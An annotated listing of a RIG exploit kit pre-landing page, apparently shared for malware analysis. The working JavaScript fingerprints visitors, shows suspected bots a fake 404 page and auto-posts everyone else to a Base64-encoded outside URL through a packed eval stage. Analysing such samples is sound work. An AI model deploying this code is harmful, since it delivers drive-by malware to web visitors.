MalwareBreakdown

RIG EK Pre-Landing Page

Mar 7th, 2018
  1.  
  2.  
  3. <!DOCTYPE html>
  4. <html lang="en">
  5. <head>
  6. <title></title>
  7. <meta charset="UTF-8">
  8. <meta http-equiv="X-UA-Compatible" content="IE=EDGE">
  9. <meta name="apple-mobile-web-app-capable" content="yes">
  10. <meta name="apple-mobile-web-app-status-bar-style" content="black">
  11. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  12. </head>
  13. <body>
  <!-- Execution trigger: when this empty about:blank iframe fires onload, go() is
       scheduled 99 ms later through the string form of setTimeout, which evaluates
       its argument as code. go() does not appear in clear text on the page; it is
       defined by the packed eval() script further down. As the only iframe in the
       document, this element is also window.frames[0], which that script uses as
       the container for its auto-submitted form. -->
  14. <iframe onload="window.setTimeout('go()', 99)" src="about:blank"></iframe>
  15. <script>
  16.  
  // Global string that getBrowser() appends a fingerprint summary to
  // (UA browser, detected browser and the per-browser evidence counters).
  // Nothing else in this listing reads it, and it is absent from the packed
  // script's word list, so it looks like leftover debug/telemetry state.
  17. var MaxiMus = '';
  18.  
  // getBrowser(): visitor-profiling / anti-analysis gate of this pre-landing page.
  // Step 1 derives browser name, platform and version from navigator.userAgent.
  // Step 2 (only for desktop UAs claiming ie/chrome/firefox) probes window/document
  // properties to infer the "real" engine and sets is_bot when the UA claim and the
  // observed environment disagree. Returns the populated browsrObj; as a side effect
  // it appends a summary string to the global MaxiMus and creates implicit globals.
  19. function getBrowser() {
  20. var ua = navigator.userAgent;
  21.  
      // Result record. Every field keeps these defaults unless the code below sets it.
  22. var browsrObj = {
  23. browser: 'unknown',
  24. browser_real: '',
  25. is_bot: false,
  26. browser_quality: 0,
  27. platform: 'desktop',
  28. versionFull: '',
  29. versionShort: ''
  30. };
  31.  
      // The whole UA-parsing stage is wrapped in a try whose catch is empty, so any
      // exception here is silently discarded and execution continues after the catch.
  32. try{
  33.  
      // Immediately-invoked classifier: the first matching substring wins, so the
      // order of the tests decides the result when a UA carries several tokens.
  34. var bName = function () {
  35. if (ua.search(/Edge/) > -1) return "edge";
  36. if ((ua.search(/MSIE/) > -1) || (ua.search(/Trident/) > -1)) return "ie";
  37. if (ua.search(/Firefox/) > -1) return "firefox";
  38. if ((ua.search(/Opera/) > -1) || (ua.search(/OPR/) > -1)) return "opera";
  39. if (ua.search(/YaBrowser/) > -1) return "yabrowser";
  40. if (ua.search(/Chrome/) > -1) return "chrome";
  41. if (ua.search(/Safari/) > -1) return "safari";
  42. if (ua.search(/Maxthon/) > -1) return "maxthon";
  43. else return "unknown";
  44. }();
  45.  
  46. browsrObj.browser = bName;
  47.  
      // Mobile platforms are tagged here; the feature-probe stage below skips them.
      // (toLowerCase() is redundant with the regex's /i flag.)
  48. if(/iphone|ipad|ipod|android|blackberry|mini|windows\sce|palm/i.test(navigator.userAgent.toLowerCase())) browsrObj.platform = 'mobile';
  49.  
  50.  
      // Version extraction by splitting the UA on a browser-specific marker.
      // When a marker is missing, split(...)[1] is undefined and the chained
      // .split() (or version.split below) throws; the empty catch swallows it.
  51. var version;
  52. if(bName != 'unknown')
  53. {
  54. switch (bName) {
  55. case "edge":
  56. version = (ua.split("Edge")[1]).split("/")[1];
  57. break;
  58. case "ie":
      // Trident-style UA: version is taken from "; rv:" up to ")"; otherwise
      // from "MSIE " up to ";".
  59. if((ua.search(/Trident/) > -1))
  60. {
  61. version = (ua.split("; rv:")[1]).split(")")[0];
  62. }
  63. else
  64. {
  65. version = (ua.split("MSIE ")[1]).split(";")[0];
  66. }
  67. break;
  68. case "firefox":
  69. version = ua.split("Firefox/")[1];
  70. break;
  71. case "opera":
  72. version = ua.split("Version/")[1];
  73. break;
      // Unreachable as written: the classifier above never returns "operaWebkit".
  74. case "operaWebkit":
  75. bName = "opera";
  76. version = ua.split("OPR/")[1];
  77. break;
  78. case "yabrowser":
  79. version = (ua.split("YaBrowser/")[1]).split(" ")[0];
  80. break;
  81. case "chrome":
  82. version = (ua.split("Chrome/")[1]).split(" ")[0];
  83. break;
  84. case "safari":
  85. version = (ua.split("Version/")[1]).split(" ")[0];
  86. break;
  87. case "maxthon":
  88. version = ua.split("Maxthon/")[1];
  89. break;
  90.  
  91. }
  92.  
  93. browsrObj.versionFull = version;
  94. browsrObj.versionShort = version.split(".")[0];
  95. }
  96.  
  97. } catch (err) {}
  98.  
  99.  
      // CorrectBrowser is assigned but not referenced again in this function.
      // uaBrowser is an alias of browsrObj (same object, not a copy).
  100. var w=window,d=document;
  101. var CorrectBrowser = true;
  102. var uaBrowser = browsrObj;
      // Only isIE is declared by this var; isChrome, isFirefox and isOpera are
      // assigned without a declaration and therefore become implicit globals.
  103. var isIE = isChrome = isFirefox = isOpera = 0;
  104.  
      // Environment cross-check. It runs only for non-mobile UAs classified as
      // ie, chrome or firefox; for every other UA browser_real stays '' and
      // is_bot stays false.
  105. if(uaBrowser.platform != 'mobile' && (browsrObj.browser == 'ie' || browsrObj.browser == 'chrome' || browsrObj.browser == 'firefox'))
  106. {
      // Presence probes counted as evidence per engine. isOpera is incremented
      // here but never read afterwards in this function.
  107. if('ActiveXObject' in window) isIE++;
  108. if('chrome' in window) isChrome++;
  109. if('opera' in window) isOpera++;
  110.  
  111. if('getBoxObjectFor' in d || 'mozInnerScreenX' in w) isFirefox++;
  112.  
  113. if('WebKitCSSMatrix' in w||'WebKitPoint' in w||'webkitStorageInfo' in w||'webkitURL' in w) isChrome++;
  114.  
  115.  
      // Bitmask of feature probes: 1 iframe sandbox attribute, 2 WebSocket,
      // 4 Worker, 8 applicationCache, 16 history.pushState,
      // 32 webkitRequestFullScreen, 64 FileReader.
  116. var f=0;
  117. f|='sandbox' in d.createElement('iframe')?1:0;
  118. f|='WebSocket' in w?2:0;
  119. f|=w.Worker?4:0;
  120. f|=w.applicationCache?8:0;
  121. f|=w.history && history.pushState?16:0;
  122. f|=d.documentElement.webkitRequestFullScreen?32:0;
  123. f|='FileReader' in w?64:0;
  124.  
  125.  
      // An environment exposing none of the probed features is counted as
      // additional IE evidence.
  126. if(f==0) isIE++;
  127.  
      // Verdicts are independent ifs, not else-if, so a later match overwrites
      // an earlier one. Chrome needs both chrome probes (isChrome > 1) and no
      // Firefox evidence; Firefox needs its probe and no Chrome evidence.
  128. if(isIE > 0)
  129. {
  130. browsrObj.browser_real = 'ie';
  131. browsrObj.browser_quality = isIE;
  132. }
  133. if(isChrome > 1 && isFirefox == 0)
  134. {
  135. browsrObj.browser_real = 'chrome';
  136. browsrObj.browser_quality = isChrome;
  137. }
  138. if(isFirefox > 0 && isChrome == 0)
  139. {
  140. browsrObj.browser_real = 'firefox';
  141. browsrObj.browser_quality = isFirefox;
  142. }
  143.  
      // Gate decision: a UA claim that does not equal the detected engine marks
      // the visitor as a bot. This also fires when no verdict was reached,
      // because browser_real is then still ''.
  144. if(uaBrowser.browser != uaBrowser.browser_real) browsrObj.is_bot = true;
  145. }
  146.  
      // Appends "<ua browser>-<detected>_ie<n>chrome<n>firefox<n>" to the global MaxiMus.
  147. MaxiMus += browsrObj.browser+'-'+browsrObj.browser_real+'_ie'+isIE+'chrome'+isChrome+'firefox'+isFirefox;
  148.  
  149. return browsrObj;
  150. }
  151.  
  // Packed second stage, using the p,a,c,k,e,d wrapper (Dean Edwards packer format):
  // the wrapper replaces each base-62 token in the payload template with the entry at
  // that index in the '|'-separated word list (radix 62, 89 entries) and hands the
  // resulting source to eval(). For static analysis, capture the substituted string
  // instead of executing it.
  //
  // Reading the word list against the template, the unpacked source defines:
  //   keyStr      - the standard Base64 alphabet, assembled from five fragments.
  //   decode64(s) - strips non-Base64 characters, decodes s and returns unescape(output).
  //   go()        - the function scheduled by the iframe's onload handler. It stores
  //                 getBrowser()'s result in BrowserInfo (assigned without var, so an
  //                 implicit global) and branches on BrowserInfo.is_bot:
  //                   is_bot == true: document.write() of a static decoy page, a fake
  //                     "404 Not Found" with an "Apache/2.2.22 (Debian) Server at
  //                     Port 80" footer, so flagged visitors see an ordinary error page.
  //                   otherwise: sets window.frames[0].document.body.innerHTML to a
  //                     <form target="_parent" method="post"> whose action is
  //                     decode64(<Base64 literal>) and immediately calls submit() on it,
  //                     sending the top-level page to that URL via POST.
  //
  // The redirect target exists on the page only as the Base64 word-list entry that
  // begins "aHR0c"; decode it offline when extracting indicators. Observable
  // behaviours useful for detection: the document.write of the decoy 404 markup and
  // an auto-submitted, field-less POST form created inside an about:blank iframe.
  152. eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('8 c="L"+"K"+"M"+"V+/"+"=";s G(1){8 5="";8 e,j,k="";8 f,b,7,a="";8 i=0;8 B=/[^A-E-F-9\\+\\/\\=]/g;d(B.S(1)){}1=1.P(/[^A-E-F-9\\+\\/\\=]/g,"");Q{f=c.l(1.h(i++));b=c.l(1.h(i++));7=c.l(1.h(i++));a=c.l(1.h(i++));e=(f<<2)|(b>>4);j=((b&15)<<4)|(7>>2);k=((7&3)<<6)|a;5=5+m.n(e);d(7!=y){5=5+m.n(j)}d(a!=y){5=5+m.n(k)}e=j=k="";f=b=7=a=""}R(i<1.U);O J(5)}s N(){r=T();d(r.10==W){q.1h(\'<I><u><t>1g x w</t></u><o><v>x w</v><p>1e 1f 1j 1k 1q 1p 1o 1l 1m.</p><1d><H>1c/2.2.12 (13) 14 1a 1b</H></o></I>\')}16{D.C[0].q.o.17=\'<z 18="19" Y="X" Z="\'+G(\'11=\')+\'"></z>\';D.C[0].q.1n[0].1i()}}',62,89,'|input||||output||enc3|var||enc4|enc2|keyStr|if|chr1|enc1||charAt||chr2|chr3|indexOf|String|fromCharCode|body||document|BrowserInfo|function|title|head|h1|Found|Not|64|form||base64test|frames|window|Za|z0|decode64|address|html|unescape|QRSTUVWXYZabcdef|ABCDEFGHIJKLMNOP|ghijklmnopqrstuv|go|return|replace|do|while|exec|getBrowser|length|wxyz0123456789|true|post|method|action|is_bot|aHR0cDovLzE3Ni41Ny4yMjAuMTM3Lz9OVFF5TlRJMiZFeHpOSHRZJk9Ka09wcFQ9Ykc5allYUmxaQT09JldjaG9FdEY9Ykc5allYUmxaQT09JkpuR29qUVhBPWJXbHNhdz09JnRoZHMzNGQ9bTNZOV9jc0t1UUZOUWZqamhTQWNnSmxuZDllV2drVXBhQ3UzMExTbWhlWWdjV0YteDJNVVRwMXU5Q1dVYkkmbng0MjJDcz13WHJRTXZYY0p3RFFESWJHTXZyRVNMdEROa25RQTBLSzJJMzJfZHF5RW9IOWZXbmloTnpVU2tyMTZCMmFDJnBFcWNlRVhYV2RlPWNtVndiM0owJnBjYUZmZWtjY2g9WTJGd2FYUmhiQT09JmpUbHNJd3M9Ykc5allYUmxaQT09JmFyQmxyUFBEemNqT2xhTT1ZMjl1YzJsa1pYST0|22|Debian|Server||else|innerHTML|target|_parent|Port|80|Apache|hr|The|requested|404|write|submit|URL|was|this|server|forms|on|found|not'.split('|'),0,{}))
  153.  
  154. </script>
  155.  
  156. </body>
  157. </html>